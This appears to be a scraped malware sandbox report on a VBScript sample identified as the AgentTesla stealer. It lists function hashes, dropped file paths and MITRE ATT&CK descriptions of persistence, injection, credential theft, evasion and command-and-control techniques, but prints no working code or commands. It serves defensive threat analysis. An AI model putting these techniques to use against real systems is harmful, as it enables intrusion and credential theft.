Instruction ID: d7cff5b17b679dc9e1750fc86876bfdd1b834d44cef3d5403e46bad06db2eed5
Opcode Fuzzy Hash: ba7f5522b0530b83f0c96bfe8cd4157b95ab12474e3263cab517fc8abf769d28
Instruction Fuzzy Hash: ADE01A74D15208AFCB04DFA4D5416ACFBF4EB8A310F1080E9D80853341CA359A01DB44

Function 0977E960 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1920601008.0000000009770000.00000040.00000800.00020000.00000000.sdmp, Offset: 09770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9770000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615ed1c7243f45c1c2f60d0efa6806818b26a563e5402af80b9901cc11a87482
Instruction ID: 89ca780dca97b049871b1429dcb7d4c68c4ef981c167c628b366d7f28bbcb2dd
Opcode Fuzzy Hash: 615ed1c7243f45c1c2f60d0efa6806818b26a563e5402af80b9901cc11a87482
Instruction Fuzzy Hash: E0E0B675915208EFCB84EFA8D5457ACFBF4AB4E214F2080E99848A3351E6319A55CB41

Function 09B9CE20 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1922279912.0000000009B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9b80000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed281dbc28be54bb4b770f3abd6288efc20f9152ef3175610227118a3286256b
Instruction ID: 451e25e6b84b56c2056e992d8764b3f7f10632971e041f8e76b59983bef9b0e4
Opcode Fuzzy Hash: ed281dbc28be54bb4b770f3abd6288efc20f9152ef3175610227118a3286256b
Instruction Fuzzy Hash: 08E0EC74929608DFCB04DF94D54166CBBB4EB4A314F5081E9984927341C632AE52DB85

Function 0977D650 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1920601008.0000000009770000.00000040.00000800.00020000.00000000.sdmp, Offset: 09770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9770000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2b4ed9d62f7ee91c724999af8c9e5fce668f80f3e33d0bb2e68ebbfde42501
Instruction ID: 3f6b2a531f0faaff602be702fb786c7ce24975ceab7e83f890070fdf75d452f3
Opcode Fuzzy Hash: 0f2b4ed9d62f7ee91c724999af8c9e5fce668f80f3e33d0bb2e68ebbfde42501
Instruction Fuzzy Hash: 35E0EC71D15248DFCB54DFB8D5457ADBBF4AB0A245F5040A9980CE3240E6345A54DB45

Function 075E29F0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063b35120391bd1a61ca923b8bf0e1c9633119f6330a5ab163854ca988afc510
Instruction ID: c112943eda5c0353beecc5aef4e6c9664d3635eaa85fa1a1258ec81ba1d24e82
Opcode Fuzzy Hash: 063b35120391bd1a61ca923b8bf0e1c9633119f6330a5ab163854ca988afc510
Instruction Fuzzy Hash: 35D05EB200E3C06FCF03C72446455863F656E8771131480EAE0C58E022C227C85EDB51

Function 0524AE64 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40c71b1e3626cafcbe19a159ba36c1eafb1bfffc6e793c7eb8719386a9cfac
Instruction ID: c51b5799fc4731703ed356cfd84ad40cb0ef74e33f5e2a547c3811ee9533105c
Opcode Fuzzy Hash: 3f40c71b1e3626cafcbe19a159ba36c1eafb1bfffc6e793c7eb8719386a9cfac
Instruction Fuzzy Hash: 8BE0B678E51208CFDF14DF94D850AADB7B2BF49301F604519D002BB290C734AD428F14

Function 09B9D1E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1922279912.0000000009B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9b80000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e366c7ed4ca450d2dcc8f4652e67551d381a62642f65f57dd919485e3a1cd5c7
Instruction ID: 04aafc3f642fbe7db9e53979680a0c7c74d3f90f4ea2f8947603ac5b7ad93fb5
Opcode Fuzzy Hash: e366c7ed4ca450d2dcc8f4652e67551d381a62642f65f57dd919485e3a1cd5c7
Instruction Fuzzy Hash: 76C02B3207AB048FCE0C164EB20D3B473ECD34F319F401460B00D030D1466A4894C55C

Function 0524C625 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bc396c652484f762fe5371b6ee6a15727f005c0f1751b80fc4b91f5a53e5490
Instruction ID: 80adf7cc3830a0ee96bd291d6b69dcd3c8e4a184b49c4ccc360fe59002a9547d
Opcode Fuzzy Hash: 2bc396c652484f762fe5371b6ee6a15727f005c0f1751b80fc4b91f5a53e5490
Instruction Fuzzy Hash: 11C08075F111649BE714D758DC1076D3566BFC1B80F100159E4067F3D0CD604D40CF80

Function 075E9761 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cb668e3616a6866cdeb442053ab9cf2115770d532d69a7e95fabee9c44e3f51
Instruction ID: b26610ad0b72f4fc52e7d9d1aeba8f40cdcc54abb7004e6005157720a1c3f5f4
Opcode Fuzzy Hash: 9cb668e3616a6866cdeb442053ab9cf2115770d532d69a7e95fabee9c44e3f51
Instruction Fuzzy Hash: 06B092AD00E3C66ECA07AB28E5A44D87F36ADA32503D542D7C080C64A3C20AA45D8BB6

Function 097766DD Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1920601008.0000000009770000.00000040.00000800.00020000.00000000.sdmp, Offset: 09770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9770000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddef96ff0ba366b3dec67785315ed9f53c11e8375819bc97456db4ad08cc7d80
Instruction ID: 4937f87b05adcddab97d9dcb0299fc5961da5aec10f5d48367665b909f68c148
Opcode Fuzzy Hash: ddef96ff0ba366b3dec67785315ed9f53c11e8375819bc97456db4ad08cc7d80
Instruction Fuzzy Hash: 2DC04C76E5001E9BCF04DBDDE4418DCF7B5EF94322F008036D215A7104D6311566CF50

Function 075EBC30 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 05249C48 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15addea50a57a3a3a457a42fd99bc028cfe2d6e1945a7461f076ac06622f9ad
Instruction ID: de601df76419b4a531edcd6194889fc9164859cb87ef20e0361475ac824313f0
Opcode Fuzzy Hash: f15addea50a57a3a3a457a42fd99bc028cfe2d6e1945a7461f076ac06622f9ad
Instruction Fuzzy Hash: 72A012121A4A4529CF419624940A2C83B919490320308418D8110C400AC11C40E0C544

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DOCUMENTS.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h1oj4qk.r42.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0wyl44c.bgw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1kdxc0y.ffv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4hfn30r.nfv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njty0lbc.54x.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xerhkduq.lt2.ps1

C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs

C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe

C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs:Zone.Identifier

Windows Analysis Report
DOCUMENTS.vbs

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre